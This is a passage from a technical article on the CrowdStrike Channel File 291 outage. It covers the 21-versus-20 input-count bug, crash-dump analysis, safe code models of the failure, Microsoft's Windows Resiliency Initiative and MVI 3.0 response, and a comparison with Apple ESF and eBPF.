The Sensor Content versus Rapid Response Content distinction is the architectural detail that determines why a content update could reach the kernel at all. Sensor Content is signed and version-bumped together with the driver binary; Rapid Response Content is pushed independently and rapidly. The Falcon architecture used the Rapid Response Content channel to deliver Template Instances against a Template Type schema that the in-kernel Content Interpreter parsed. The channel-file delivery path bypassed the WHQL driver-signing scrutiny that the driver binary itself had received [@cs-pir-2024-07-24].

Content Interpreter: the CrowdStrike Falcon Sensor subsystem, resident inside `csagent.sys` at kernel privilege, that parses Rapid Response Content channel files at runtime. The interpreter reads a Template Instance (a binary payload of detection rules) and evaluates it against the corresponding Template Type schema declared in the sensor's compiled code. Detection rules thus take effect on a host whenever a new channel file is pushed from the Falcon Cloud, with no sensor binary update required.
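To see why a data file can change kernel behaviour without a driver update, consider the smallest possible version of the idea. The Python sketch assumes a made-up wire format (a 16-bit field count, then a kind byte and a 32-bit value per field); CrowdStrike's real channel-file format is not public, and nothing here should be read as describing it. `encode_instance` stands in for a cloud-side rule compiler, `parse_instance` for the interpreter's loader, and `evaluate` for compiled code whose behaviour the data decides.

```python
import struct
from typing import List, Optional, Sequence

# Hypothetical wire format (NOT CrowdStrike's, which is not public):
#   u16 field_count, then per field: u8 kind (0 = wildcard, 1 = literal), u32 value
HEADER = struct.Struct("<H")
FIELD = struct.Struct("<BI")


def encode_instance(matchers: Sequence[Optional[int]]) -> bytes:
    """Serialize one Template Instance; None means wildcard."""
    out = bytearray(HEADER.pack(len(matchers)))
    for m in matchers:
        out += FIELD.pack(0, 0) if m is None else FIELD.pack(1, m)
    return bytes(out)


def parse_instance(blob: bytes) -> List[Optional[int]]:
    """Decode a Template Instance into one matcher per field."""
    (count,) = HEADER.unpack_from(blob, 0)
    matchers, offset = [], HEADER.size
    for _ in range(count):
        kind, value = FIELD.unpack_from(blob, offset)
        offset += FIELD.size
        matchers.append(None if kind == 0 else value)
    return matchers


def evaluate(matchers: Sequence[Optional[int]], inputs: Sequence[int]) -> bool:
    """Fixed interpreter code: wildcards match anything, literals must be equal."""
    return all(m is None or inputs[i] == m for i, m in enumerate(matchers))
```

Pushing a different blob changes what `evaluate` does on every host that loads it, and no part of that path is a new driver binary.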

The bug, exactly

CrowdStrike's RCA names the failure mode in plain language [@cs-rca-2024-08-06]. The IPC Template Type was introduced in Falcon sensor version 7.11, released on February 28, 2024. The IPC Template Type declares 21 input parameter fields. The sensor's integration code that fed the in-kernel Content Interpreter for this Template Type supplied only 20 input values -- one fewer than the schema declared. The Content Validator that was responsible for verifying each shipped Template Instance against its Template Type schema did not catch the count mismatch. From February 28 to July 19, every Template Instance shipped against this Template Type happened to use a wildcard matcher on the 21st field, so the missing 21st input was never read; the bug was latent for almost five months. On July 19, 2024, a newly deployed Template Instance used a non-wildcard matcher on the 21st field for the first time. At runtime on every Windows host running an affected sensor that received the file, csagent.sys's Content Interpreter indexed into the 21st parameter slot and read past the end of the 20-entry input array [@cs-rca-2024-08-06].
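The failure can be reproduced in miniature. In the Python sketch below, the counts 21 and 20 come from CrowdStrike's RCA; everything else (the string inputs, the value `"illustrative-pipe"`, the function names) is hypothetical. Python raises `IndexError` where the in-kernel interpreter simply read past the end of its array, which makes the latent bug visible instead of fatal. `validate` is one possible form of a count check, comparing the declared field count against what the integration code actually supplies, so it flags every instance of the Template Type, wildcard or not.

```python
from typing import Optional, Sequence

DECLARED_FIELDS = 21  # input fields declared by the IPC Template Type (RCA)
SUPPLIED_INPUTS = 20  # values the sensor's integration code supplied (RCA)
WILDCARD = None       # matcher that accepts anything and never reads its input


def evaluate(matchers: Sequence[Optional[str]], inputs: Sequence[str]) -> bool:
    """Only non-wildcard slots dereference their input value."""
    for i, want in enumerate(matchers):
        if want is WILDCARD:
            continue
        if inputs[i] != want:  # IndexError here models the out-of-bounds read
            return False
    return True


def validate(matchers: Sequence[Optional[str]], supplied: int) -> Optional[str]:
    """Hypothetical validator that checks counts, not just instance syntax."""
    if len(matchers) != DECLARED_FIELDS:
        return f"instance has {len(matchers)} matchers; type declares {DECLARED_FIELDS}"
    if supplied != DECLARED_FIELDS:
        return f"type declares {DECLARED_FIELDS} inputs; sensor supplies {supplied}"
    return None
```

An all-wildcard 21st slot evaluates cleanly against 20 inputs; a literal in that slot reaches `inputs[20]`. Both instances have 21 matchers, so both pass any check that compares an instance only against its schema.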

The faulting instruction was the mov r9d, dword ptr [r8] that Microsoft's July 27 post reproduces. The pointer in r8 was the unmapped kernel address 0xffff840500000074. The CPU page-faulted. The fault was delivered to nt!KiPageFault+0x369. The kernel bug-checked with PAGE_FAULT_IN_NONPAGED_AREA [@ms-secblog-2024-07-27].

- `READ_ADDRESS: ffff840500000074 Paged pool`. The virtual address the faulting instruction tried to read. The `ffff8405...` prefix places it in the upper half of the x86-64 canonical address space, which Windows uses for kernel virtual memory. The "Paged pool" label is the memory manager's classification of where the address would have lived if it had been mapped. At this instant, it was not.
- `IMAGE_NAME: csagent.sys`. The kernel module containing the faulting instruction. This is the CrowdStrike driver.
- `FAULTING_IP: csagent+e14ed`. The location of the faulting instruction, expressed as an offset from the load base of `csagent.sys`: `e14ed` is the relative virtual address of the instruction itself, inside the routine that reads the parameter slot.
- `mov r9d, dword ptr [r8]`. The instruction itself: load a 32-bit value (`dword`) from the address in `r8` into `r9d`, the lower 32 bits of `r9`. This is one of the cheapest x86-64 memory loads possible; the bug is not in the instruction but in the value of `r8`.
- `CALLED_FROM: nt!KiPageFault+0x369`. The point of return into the kernel's fault handler. `KiPageFault` is the standard page-fault (#PF) trap handler in `ntoskrnl.exe`. When the page fault could not be satisfied (no mapping for the requested address), `KiPageFault` raised the bug check that stopped the system.
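The dump fields can be decoded mechanically. The sketch below is a minimal illustration assuming 4-level paging (48-bit virtual addresses, the common x86-64 configuration): it checks which half of the canonical address space `READ_ADDRESS` falls in, and shows how a `module+offset` notation such as `csagent+e14ed` maps to an absolute address. The module base used here is an invented placeholder, not the driver's real load address.

```javascript
// Sketch: classify an x86-64 virtual address, assuming 4-level paging
// (48-bit virtual addresses). Under 5-level paging the boundary moves.
function classifyVA(va) {
  const top = va >> 47n; // bits 63..47 must be all zeros or all ones
  if (top === 0n) return 'canonical, lower half (user mode on Windows)';
  if (top === 0x1ffffn) return 'canonical, upper half (kernel mode on Windows)';
  return 'non-canonical';
}

// Resolve "module+offset" (e.g. csagent+e14ed) to an absolute address.
function resolve(base, offset) {
  return base + offset;
}

const READ_ADDRESS = 0xffff840500000074n;
console.log(classifyVA(READ_ADDRESS)); // canonical, upper half (kernel mode on Windows)

const placeholderBase = 0xfffff80000000000n; // hypothetical module base
console.log(resolve(placeholderBase, 0xe14edn).toString(16)); // fffff800000e14ed

// mov r9d, dword ptr [r8] reads 4 bytes, so r8 .. r8+3 must all be mapped.
console.log((READ_ADDRESS + 3n).toString(16)); // ffff840500000077
```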

The IRQL is the part of the post-mortem this article treats most carefully. As section 1 established, neither CrowdStrike's RCA nor Microsoft's security blog post publishes the IRQL value at the moment of the fault [@ms-secblog-2024-07-27, @cs-rca-2024-08-06]. This article will not assert DISPATCH_LEVEL or any other specific value, because no primary source establishes one. Treat any third-party reconstruction that names the IRQL as speculation unless it cites a primary source.

sequenceDiagram
    participant Cloud as Falcon Cloud
    participant Sensor as Falcon Sensor (user mode)
    participant CI as Content Interpreter (csagent.sys)
    participant TT as Template Type schema, in driver
    participant TI as Template Instance, from channel file
    participant Kernel as Windows Kernel
    Cloud->>Sensor: Push Channel File 291 (Rapid Response Content)
    Sensor->>CI: Hand Template Instance to in-kernel interpreter
    CI->>TT: Read schema declaring 21 input parameter fields
    CI->>TI: Bind Template Instance values to schema fields
    Note over CI,TI: Integration code supplied 20 values, schema expected 21
    Note over CI,TI: Content Validator did not catch the count mismatch
    CI->>TI: Index into 21st field for non-wildcard match
    CI->>Kernel: Read at unmapped kernel address 0xffff840500000074
    Kernel->>Kernel: nt!KiPageFault, bug check 0x50 raised
    Note over Kernel: Operating system stops, host blue screens

Why a content update can crash a kernel driver

This paragraph is doing the load-bearing work of the entire article, and it deserves to be read slowly. The Falcon driver's code received WHQL signing scrutiny when CrowdStrike submitted each release of csagent.sys to Microsoft. The driver's content updates -- the channel files like Channel File 291 -- did not. The driver was architected so that data updates could drive new detection behavior without a driver release. Therefore the data file became the trust boundary. When the data file was malformed in a way the Content Validator missed, the entire WHQL signing scrutiny of the driver was effectively bypassed -- because the bug was triggered by a fully-signed driver consuming an unsigned data input that no one had validated against the driver's actual runtime expectations.

Note: The architectural lesson of Channel File 291 is not "kernel drivers are unsafe." It is that in modern EDR architectures, the cadence of content updates vastly outruns the cadence of code review, and when the content is interpreted in kernel context, the content becomes a kernel input. The trust boundary moved from the signed driver to the unsigned data file, and the industry had not named that movement before July 19, 2024. Microsoft Virus Initiative 3.0, which we will meet in section 6, names it explicitly and requires partners to engineer for it.

To make the abstract count mismatch tangible for the reader who has never written a parser, here is the bug in a stripped JavaScript model. A memory-safe runtime never hands back stray memory from past the end of an array (JavaScript returns undefined), and the model's checked branch goes one step further, throwing cleanly the way a bounds-checking validator would. The comment in the unchecked branch describes the C / kernel reality: the read returns whatever bytes happen to live at the out-of-bounds address, which on the affected Windows hosts was an unmapped page, so the load triggered a PAGE_FAULT_IN_NONPAGED_AREA bug check.

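```javascript
// Model of the in-kernel Content Interpreter from CrowdStrike's RCA.
// Template Type schema declares 21 fields; integration code supplied 20.
// On July 19, 2024, the deployed Template Instance for the first time
// used a non-wildcard matcher on the 21st field.

const schema = { fieldCount: 21 };
const instance = { values: Array.from({ length: 20 }, (_, i) => 'v' + i) };

// Hypothetical interpreter: binds every schema field to a supplied value.
// checked = true models a memory-safe runtime; false models the C driver.
function runInterpreter(schema, instance, checked) {
  const bound = [];
  for (let i = 0; i < schema.fieldCount; i++) {
    if (checked && i >= instance.values.length) {
      throw new RangeError(
        `field ${i + 1} of ${schema.fieldCount} requested, only ${instance.values.length} supplied`);
    }
    // Unchecked: C reads whatever lies past the array. In csagent.sys that was an
    // unmapped page, so the load faulted; JavaScript yields undefined instead.
    bound.push(instance.values[i]);
  }
  return bound;
}

// Memory-safe runtime catches the mismatch:
try {
  runInterpreter(schema, instance, true);
} catch (e) {
  console.log('SAFE:', e.message);
}

// Unsafe model showing what the in-kernel C interpreter would do:
const bound = runInterpreter(schema, instance, false);
console.log('UNSAFE: field 21 =', bound[20]);
```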

The runnable model is doing one job: making the abstract "20 of 21" fault mode visible. In the checked branch, the bounds check catches the mismatch and throws. In a C kernel driver with no runtime bounds check, the load just happens, and whatever is at the out-of-bounds address is read. In csagent.sys on every affected Windows host on July 19, 2024, what was at the out-of-bounds address was an unmapped page, and the read fired PAGE_FAULT_IN_NONPAGED_AREA.

The persistence problem

CrowdStrike reverted the bad content cloud-side at 05:27 UTC, seventy-eight minutes after pushing it [@cs-pir-2024-07-24]. The revert achieved exactly the thing it was designed to achieve: no host that had not yet received the bad content would receive it. The revert achieved nothing for any host that had already received the bad content. The channel file was on disk. On reboot, the Falcon sensor reloaded it. The in-kernel Content Interpreter parsed it again. The host bug-checked again. The fix required manual, per-host intervention: boot into Safe Mode or the Windows Recovery Environment and delete C-00000291*.sys, the canonical morning-of runbook circulated on every Windows admin forum. The persistence-across-reboot pathology motivated the platform-level recovery primitive Microsoft would later ship as Quick Machine Recovery [@mslearn-qmr, @insider-build-26120-4230], which we will meet in section 6.
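The persistence problem reduces to a small state model: the cloud revert changes what future downloads receive, while a host that already holds the bad file crashes before it can download anything. The following is a minimal sketch with hypothetical names (`sync`, `boot`, and a `disk` field standing in for the channel-file directory), and it simplifies by letting a host fetch content only while it is fully up.

```javascript
// Minimal model of why a cloud-side revert did not rescue affected hosts.
// All names are hypothetical illustrations.
const cloud = { channel291: 'bad' };

function makeHost() {
  return { disk: null, state: 'up' };
}

// A host fetches content only while it is running (simplifying assumption).
function sync(host) {
  if (host.state === 'up') host.disk = cloud.channel291;
}

// On boot the sensor reloads whatever channel file is already on disk.
function boot(host) {
  host.state = host.disk === 'bad' ? 'bugcheck' : 'up';
  return host.state;
}

const early = makeHost();
const late = makeHost();

sync(early);               // receives bad content before 05:27 UTC
boot(early);               // crashes
cloud.channel291 = 'good'; // cloud-side revert
sync(early);               // no effect: the host is not running
sync(late);                // receives the reverted content

console.log(boot(early), boot(early)); // bugcheck bugcheck (boot loop)
console.log(boot(late));               // up

early.disk = null; // manual fix: delete C-00000291*.sys from Safe Mode
console.log(boot(early));              // up
```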

The bug is mundane. The kernel context is what made it catastrophic. Twenty-five years of architectural decisions placed a vendor-authored interpreter inside the kernel, plugged it into a cloud-driven content delivery pipeline, and shipped that combination to 8.5 million machines. On the morning of July 19, 2024, those decisions composed.

What the platform vendor -- Microsoft -- did about that composition is the subject of section 6.

6. The Microsoft Response: WESES, WRI, MVI 3.0

Two weeks before a Congressional witness from CrowdStrike apologized on the record [@cyberscoop-meyers, @govinfo-chrg-118hhrg60030, @meyers-testimony, @homeland-hearing-page], Microsoft did what twenty years of lobbying could not produce: it convened the named Microsoft Virus Initiative partners in Redmond and announced that "additional security capabilities outside of kernel mode" was now a stated platform direction [@weston-2024-09-12]. From that meeting forward, the trajectory of third-party endpoint security on Windows pointed in only one direction.

September 10, 2024: the WESES summit

On September 10, 2024, Microsoft hosted the Windows Endpoint Security Ecosystem Summit (WESES) at its Redmond campus. The attendees included CrowdStrike, Sophos, ESET, SentinelOne, Trend Micro, and Bitdefender, plus U.S. and European government officials [@weston-2024-09-12]. David Weston, Microsoft's vice president for enterprise and operating system security, recapped the summit in a Windows Experience Blog post on September 12, 2024 -- two days later -- and made two specific commitments on Microsoft's behalf. First, Microsoft committed publicly to Safe Deployment Practices as a shared cross-vendor norm. Second, Microsoft committed to "additional security capabilities outside of kernel mode" as a platform direction [@weston-2024-09-12]. No new branded platform yet, no GA date, no API surface. But the political commitment was, for the first time on the public record, an architectural one.

Microsoft Virus Initiative (MVI): A Microsoft program documenting the requirements third-party antivirus and endpoint security vendors must meet to ship products that integrate with Windows -- including Security Center registration, ELAM (Early-Launch Anti-Malware) participation, and Defender exclusion negotiation [@mslearn-mvi]. MVI is the contractual surface Microsoft uses to require Windows AV vendors to engineer in particular ways; updates to MVI requirements have been the principal lever for the post-Channel-File-291 reforms.

November 19, 2024: Microsoft Ignite, and the Windows Resiliency Initiative

Two months later, at Microsoft Ignite on November 19, 2024, Weston announced the program by name: the Windows Resiliency Initiative, four pillars (reliability including Quick Machine Recovery, fewer administrator-privileged apps, stronger app and driver allow-lists, and identity hardening), and a verbatim commitment that "a private preview will be made available for our security product [partner cohort] in July 2025" [@ms-ignite-2024-11-19]. The "private preview" referred to a new set of user-mode EDR APIs that Microsoft would deliver to a small named cohort of MVI partners. The Ignite post is also the first source to introduce Quick Machine Recovery publicly -- the post-outage recovery primitive engineered specifically to address the on-disk-persistence pathology that Channel File 291 had exposed [@ms-ignite-2024-11-19].

Windows endpoint security platform: Microsoft's descriptive phrase, used consistently in Weston's June 26, 2025 blog and the November 18, 2025 Windows Experience Blog post, for the new user-mode API surface that lets third-party EDR products subscribe to kernel-curated security telemetry without loading their own kernel driver [@weston-2025-06-26, @ms-nov-2025]. Microsoft has not, as of mid-2026, branded this as a single trademarked proper noun; trade-press shorthand like "WESP" should be treated as commentary, not as a Microsoft product name.

Note: You will see "WESP" -- Windows Endpoint Security Platform, capitalized -- in trade-press coverage and conference talks. As of mid-2026 it is not a Microsoft brand. Microsoft's own primary-source language is the descriptive phrase "the Windows endpoint security platform" (lowercase, no acronym) [@weston-2025-06-26, @ms-nov-2025]. This article uses the Microsoft phrasing throughout.

June 26, 2025: the WRI detailed rollout and MVI 3.0

The most consequential single document in the entire WRI story is Weston's June 26, 2025 Windows Experience Blog post [@weston-2025-06-26]. The post commits, verbatim, that "Next month, we will deliver a private preview of the Windows endpoint security platform to a set of MVI partners... security products like anti-virus and endpoint protection solutions can run in user mode just as apps do" [@weston-2025-06-26]. That second clause is the architectural commitment in one sentence: third-party EDR on Windows runs in user mode, like every other application on Windows.

The same June 26 post names the MVI partner cohort by company -- Bitdefender, CrowdStrike, ESET, SentinelOne, Sophos, Trellix, Trend Micro, and WithSecure -- and embeds on-record statements endorsing the migration from CrowdStrike, ESET, SentinelOne, Sophos, Trellix, Trend Micro, and WithSecure [@weston-2025-06-26]. The post lays out the requirements of MVI 3.0: Safe Deployment Practices, deployment rings, monitored rollouts, and incident-response testing [@mslearn-mvi]. The November 18, 2025 Windows Experience Blog post later stated the MVI 3.0 effective date as April 1, 2025 [@ms-nov-2025].

| MVI 3.0 requirement | What it mechanically requires | What it does not mechanically verify |
|---|---|---|
| Safe Deployment Practices | Vendor publishes a documented deployment process for sensor and content updates | That the published process is correctly enforced in the vendor's release pipeline |
| Deployment rings | Vendor segments customers into staged rollout cohorts (e.g., internal, canary, GA) | That ring promotion gates actually halt a rollout when a stop-signal fires |
| Monitored rollouts | Vendor monitors signal data during each ring transition | That the monitoring catches a Channel-File-291-class latent bug |
| Incident-response testing | Vendor runs scheduled incident-response drills against its own rollout pipeline | That drill outcomes generalize to a novel failure mode never tested |
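The rows of the table describe a staged rollout with a stop signal. A minimal sketch of that control loop follows; the ring names, ring sizes, and the 0.1 percent crash-rate threshold are hypothetical values chosen for illustration, not figures from MVI 3.0 or from any vendor.

```javascript
// Sketch of ring-based rollout with a halt gate. Ring names, sizes, and the
// threshold are hypothetical.
const RINGS = [
  { name: 'internal', hosts: 1_000 },
  { name: 'canary', hosts: 50_000 },
  { name: 'early', hosts: 500_000 },
  { name: 'ga', hosts: 8_000_000 },
];
const MAX_CRASH_RATE = 0.001; // halt if more than 0.1% of a ring crashes

// observe(ring) stands in for the telemetry a vendor collects during the
// bake period; it returns the number of hosts that crashed in that ring.
function rollout(observe) {
  let exposed = 0;
  for (const ring of RINGS) {
    exposed += ring.hosts;
    const crashRate = observe(ring) / ring.hosts;
    if (crashRate > MAX_CRASH_RATE) {
      return { halted: true, at: ring.name, exposed };
    }
  }
  return { halted: false, at: null, exposed };
}

// An update that crashes every host that receives it stops in the first ring.
console.log(rollout((ring) => ring.hosts));
// A healthy update promotes through every ring.
console.log(rollout(() => 0));
```

The sketch also shows the table's third column in miniature: the gate only halts what `observe` can see. A latent bug that stays dormant in the early rings, as the IPC Template Type bug did from February to July 2024, passes every gate.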

The cohort of named MVI 3.0 partners is the same cohort Apple's Endpoint Security framework migration targeted in 2019. The overlap is not coincidence -- the same companies sell EDR on both platforms, and they are now moving their Windows products onto the architecture they already adopted on macOS (user mode, platform-curated telemetry). The trade press has yet to fully appreciate that the WRI is not a Microsoft-specific architecture choice; it is the second platform vendor making the same choice.

The Ionescu pivot

The single most consequential individual move in the entire two-year story is dated April 3, 2025: CrowdStrike named Alex Ionescu -- co-author of the Windows Internals book series, long-time Windows kernel researcher, and former CrowdStrike employee returning to the company -- as Chief Technology Innovation Officer with an explicit charter to "lead CrowdStrike's participation in the Microsoft Virus Initiative Program (MVI 3.0), working with Microsoft to advise on the implementation of the next-generation vendor security stack for Windows" [@cs-ionescu-ctio-2025-04-03]. Ionescu then published an on-record endorsement of Microsoft's user-mode EDR architecture in Microsoft's own June 26, 2025 Windows Experience Blog post [@weston-2025-06-26].

Key idea: The foremost public Windows kernel researcher in the industry, now CTIO of the company whose kernel driver brought down 8.5 million Windows hosts, is on the record endorsing Microsoft's eviction of vendor kernel-mode antivirus. That is the political signal July 19, 2024 produced, and it is structurally unlike anything that preceded the outage. In 2006, the vendors fought; in 2025, the foremost vendor kernel expert is helping Microsoft build the replacement.

November 18, 2025: the update and the graphics-driver exemption

The most recent Microsoft primary-source document in this article is the November 18, 2025 Windows Experience Blog post [@ms-nov-2025]. Three points in that post matter for the rest of this article. First, "effective April 1, 2025, Version 3.0 of the Microsoft Virus Initiative added new requirements for all Windows antivirus (AV) partners" -- this sets the formal effective date of MVI 3.0 [@ms-nov-2025]. Second, "in June, we released the first private preview of the Windows endpoint security platform, which shifts AV enforcement from the kernel to user mode" -- the framing is AV enforcement generally, not third-party AV enforcement specifically, which by plain reading commits Defender for Endpoint to the same architectural trajectory as the third-party MVI 3.0 cohort [@ms-nov-2025]. Third, the graphics-driver exemption: "graphics drivers, for example, will continue to run in kernel mode for performance reasons" [@ms-nov-2025]. That single concession draws the scope of the WRI cleanly: it is an AV enforcement migration, not a third-party kernel driver elimination program.

Quick Machine Recovery

One more piece of the response deserves explicit mention: Quick Machine Recovery (QMR), the platform-level recovery primitive Microsoft built specifically in response to the on-disk persistence pathology of Channel File 291. QMR is a remote-remediation flow, managed via the Configuration Service Provider model and surfaced as the RemoteRemediation CSP, that can boot a failing Windows host into a recovery environment and apply targeted fixes without manual safe-mode intervention by an administrator [@mslearn-qmr]. The capability first appeared in Windows Insider builds beginning with Build 26120.4230 on June 2, 2025 [@insider-build-26120-4230]. QMR does not, on its own, prevent another Channel-File-291-class event; it makes recovery from one far cheaper by replacing per-host manual intervention with a remotely managed flow.

flowchart LR
    A["2024-07-19 Channel File 291 outage, 8.5M hosts"] --> B["2024-07-27 Microsoft secblog publishes WinDbg dump"]
    B --> C["2024-09-10 WESES summit at Redmond"]
    C --> D["2024-09-24 House Homeland Security hearing"]
    D --> E["2024-11-19 Ignite, WRI announced by name"]
    E --> F["2025-04-01 MVI 3.0 effective"]
    F --> G["2025-04-03 Ionescu CTIO at CrowdStrike"]
    G --> H["2025-06-26 WRI detailed rollout, partner cohort"]
    H --> I["2025-07 private preview to MVI 3.0 partners"]
    I --> J["2025-11-18 AV enforcement shifts to user mode"]

The U.S.-government context is worth one paragraph of framing. The Government Accountability Office's GAO-24-107733, the Congressional Research Service's IF12717 brief, the House Homeland Security Subcommittee hearing on September 24, 2024, CISA's continuously updated alert, and the contemporaneous CyberScoop coverage all converge on the same posture: the July 19 outage was a supply-chain and Safe-Deployment-Practices event, not a cyberattack [@gao-24-107733, @crs-if12717-everycrsreport, @homeland-hearing-page, @govinfo-chrg-118hhrg60030, @meyers-testimony, @cisa-alert-2024-07-19, @cyberscoop-meyers]. The federal response shaped the political environment in which Microsoft chose to announce the WRI; it did not, by itself, design the architecture. The architecture Microsoft picked had been hiding in plain sight for years on two other operating systems, which is the subject of section 7.

7. Apple ESF, Linux eBPF, and the Comparative Architecture

Microsoft did not invent the architecture it is shipping. Two other major operating systems had already answered the same question years earlier, in opposite directions, and Microsoft's own platform team had been quietly experimenting with both answers for years before committing to one in public. The comparative-architecture frame matters because it tells us what is genuinely novel about the WRI (very little) and what is genuinely novel about the political moment (almost everything).

Apple Endpoint Security framework, October 7, 2019

On October 7, 2019, with the release of macOS 10.15 Catalina, Apple deprecated third-party kernel extensions for security tools and replaced them with the Endpoint Security framework, a user-space API for authorization (ES_EVENT_TYPE_AUTH_*) and notification (ES_EVENT_TYPE_NOTIFY_*) events fired by the macOS kernel and consumed by user-mode system extensions that third-party vendors write and that Apple authorizes through a restricted Endpoint Security entitlement [@apple-esf-docs].

Endpoint Security framework (ESF): Apple's user-space-only API for security tools, introduced with macOS Catalina (10.15) in October 2019 [@apple-esf-docs]. ESF clients run as system extensions in user mode, subscribe to authorization and notification events emitted by the macOS kernel (process creation, file open, network connect, etc.), and may return `ES_AUTH_RESULT_DENY` to block authorization events synchronously. There is no third-party kernel code path; the kernel signals the user-space client, and the user-space client decides.

What makes ESF the cleanest reference point for the WRI is that ESF is the architecture Microsoft is now shipping under a different label. Both are platform-curated user-mode subscription APIs. Both eliminate third-party kernel drivers from the AV path. Both retain a synchronous authorization gate that lets the vendor's user-mode code answer "allow or deny" before the operating system completes the operation.
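The synchronous authorization gate, and the reason it contains vendor faults, can be modeled in a few lines. This is a hypothetical sketch of a broker in general, not Apple's ESF API and not Microsoft's unpublished platform API: `makeBroker`, `subscribe`, and `authorize` are invented names, and the fail-open policy on a client fault is an assumption (a real platform might fail closed, time out, or terminate the client).

```javascript
// Hypothetical model of a platform-curated authorization broker. Not ESF and
// not the Windows platform API; it only illustrates the control flow.
const ALLOW = 'allow';
const DENY = 'deny';

function makeBroker({ onClientFault }) {
  const clients = [];
  return {
    subscribe(handler) { clients.push(handler); },
    // Called by the (simulated) kernel before it completes an operation.
    authorize(event) {
      for (const handler of clients) {
        let verdict;
        try {
          verdict = handler(event);
        } catch {
          // A crashing vendor client is contained here; the kernel keeps running.
          verdict = onClientFault;
        }
        if (verdict === DENY) return DENY;
      }
      return ALLOW;
    },
  };
}

const broker = makeBroker({ onClientFault: ALLOW }); // assumed fail-open policy
broker.subscribe((ev) => (ev.path.endsWith('.evil') ? DENY : ALLOW));
broker.subscribe(() => {
  const fields = ['a', 'b'];
  return fields[5].length ? ALLOW : DENY; // bad content: throws TypeError
});

console.log(broker.authorize({ type: 'exec', path: '/tmp/payload.evil' })); // deny
console.log(broker.authorize({ type: 'exec', path: '/usr/bin/ls' }));      // allow
```

The point is where the fault lands: the second subscriber's bad-content read throws inside its own handler, and the simulated kernel keeps answering requests. In the Channel File 291 design, the equivalent fault happened inside the kernel itself.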

The September 2024 Sequoia bug -- the natural experiment we met in section 4 -- is the cleanest available test of whether the ESF architecture contains the blast radius of a first-party platform regression. CrowdStrike Falcon for macOS, ESET Endpoint Security, Microsoft Defender for Mac, and SentinelOne all lost network filtering when macOS 15 deprecated the Application Firewall property-list interface [@bleepingcomputer-sequoia, @securityweek-sequoia]. None of them brought down macOS. The hosts kept running. Apple shipped 15.0.1 three weeks later [@techcrunch-sequoia]. The Sequoia outage tested the architecture and the architecture held: feature regression, yes; kernel panic at fleet scale, no.

Linux eBPF, and eBPF for Windows

The Linux answer to the same question is in a different direction entirely. Linux does not move EDR out of kernel mode; it keeps EDR in kernel mode and proves the in-kernel code safe before executing it. The technology is extended Berkeley Packet Filter (eBPF), a kernel-resident bytecode virtual machine that runs vendor-supplied probes attached to kernel hook points, with a static verifier that rejects any program whose memory accesses, control flow, or loop bounds cannot be proven safe at load time [@lwn-bounded-loops].

eBPF (extended Berkeley Packet Filter): A Linux kernel subsystem that runs vendor-supplied bytecode programs in kernel context, gated by a static verifier that rejects programs whose memory accesses or control flow cannot be proven safe at load time. eBPF programs attach to hook points (syscall enter/exit, file system events, network packets, tracepoints) and emit data to user space via ring buffers and maps. Open-source Linux runtime-security tools such as Falco and Tetragon are built on eBPF, as is the Cilium networking stack [@lwn-bounded-loops].

The eBPF verifier is non-trivial. Jonathan Corbet's June 2019 LWN article "BPF and bounded loops" describes the Linux 5.3 extension that lifted the original verifier's strict no-loops restriction, permitting bounded loops with statically-determinable trip counts -- enough to write nontrivial in-kernel programs without sacrificing the verifier's termination guarantee [@lwn-bounded-loops]. Every major Linux EDR product in 2026 ships an eBPF probe set as its primary collection substrate.
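A verifier's job is to reject a program before it runs. The toy below is not the Linux or PREVAIL verifier: it invents a three-instruction bytecode (`load`, `jmp`, `exit`) with constant offsets only, whereas real eBPF verifiers track register types and value ranges along every path. It enforces two properties the text describes: every memory access stays in bounds, and, following the pre-5.3 rule, no jump goes backward, which guarantees termination. The 4-byte field width used to map "field 21" to offset 80 is an assumption.

```javascript
// Toy static verifier in the spirit of (not equivalent to) the eBPF verifier.
// Hypothetical instruction set:
//   { op: 'load', off }  read 4 bytes at ctx[off]
//   { op: 'jmp', to }    unconditional jump to instruction index `to`
//   { op: 'exit' }
function verify(prog, ctxSize) {
  for (let pc = 0; pc < prog.length; pc++) {
    const insn = prog[pc];
    // Rule 1: every load stays inside the context buffer.
    if (insn.op === 'load' && (insn.off < 0 || insn.off + 4 > ctxSize)) {
      return `reject: pc ${pc} reads bytes ${insn.off}..${insn.off + 3}, context is ${ctxSize} bytes`;
    }
    // Rule 2: no backward jumps (pre-5.3 "no loops"), so execution terminates.
    if (insn.op === 'jmp' && insn.to <= pc) {
      return `reject: pc ${pc} jumps backward to ${insn.to}`;
    }
    if (insn.op === 'jmp' && insn.to >= prog.length) {
      return `reject: pc ${pc} jumps outside the program`;
    }
  }
  // Rule 3: straight-line execution must end in exit, not fall off the end.
  if (prog.length === 0 || prog[prog.length - 1].op !== 'exit') {
    return 'reject: program does not end in exit';
  }
  return 'accept';
}

// 20 four-byte inputs make an 80-byte context; "field 21" sits at offset 80.
const CTX = 20 * 4;
console.log(verify([{ op: 'load', off: 76 }, { op: 'exit' }], CTX)); // accept
console.log(verify([{ op: 'load', off: 80 }, { op: 'exit' }], CTX)); // reject: pc 0 reads bytes 80..83, context is 80 bytes
console.log(verify([{ op: 'jmp', to: 0 }, { op: 'exit' }], CTX));    // reject: pc 0 jumps backward to 0
```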

Microsoft has its own eBPF port. eBPF for Windows has been public on GitHub since May 2021, adopted the PREVAIL verifier as its formal foundation, and remains under active development in the same repository [@msft-ebpf-windows, @ebpf-windows-commits].

PREVAIL is the academic verifier whose formal soundness arguments underpin eBPF for Windows. Its design takes the same general approach as the Linux verifier -- abstract interpretation over the bytecode's control flow graph -- and Microsoft adopted its open-source implementation for the Windows port. Microsoft has shipped eBPF for Windows for networking-centric use cases (XDP-style packet filtering); EDR has not been the primary published use case [@msft-ebpf-windows]. What Microsoft has not done is make eBPF for Windows the substrate of the WRI's third-party EDR architecture. The WRI commits to the Apple-style "exit the kernel" answer, not the Linux-style "stay in the kernel but verifier-bounded" answer.

The three architectural answers

There are exactly three serious architectural answers to the question of where the third-party security observer runs.

1. Exit the kernel: subscribe from user mode against a platform-curated broker. Apple ESF since 2019; Windows endpoint security platform since the July 2025 private preview.
2. Stay in the kernel, but only as a verifier-bounded extension. Linux eBPF; eBPF for Windows since 2021.
